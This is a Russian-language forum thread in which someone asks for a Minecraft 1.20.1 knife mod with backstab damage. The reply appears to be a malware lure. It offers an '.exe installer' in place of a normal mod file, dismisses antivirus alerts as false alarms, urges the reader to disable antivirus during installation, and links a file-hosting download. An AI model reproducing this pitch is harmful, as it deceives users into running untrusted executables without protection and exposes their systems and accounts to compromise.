Помогите с поиском мода для Майнкрафт 1.20.1

Стараюсь создать сборку и карту для повторения игры Counter Strike 2 но не могу найти мод добавляющий ножи которые будут убивать в спину (или наносить колоссальный урон в спину) прошу помощи найти

Чувак, я тебя понимаю, найти нормальный мод с ножами для Minecraft 1.20.1 — вообще та ещё тема, мало кто такой заморачивается. Но у меня есть крутой инсталлятор (exe), который поставит именно то, что надо, без всякой возни.

Почему exe, а не просто jar? Потому что это не просто мод, а установщик — он сам всё закинет куда надо и настроит. Короче, не нужно самому лазить в папках и всё ковырять.

Антивирусы обычно ругаются на такие файлы, потому что они меняют системные файлы — это просто ложная тревога, вирусов там нет. Чтобы не париться, лучше отключи антивирус на пару минут, пока ставишь.

Вот мод - https://mega.nz/file/ydB0majT#0ALMmy7EdJVH8TnqjNo74rIDvzhOagCrugSL8ifqEo0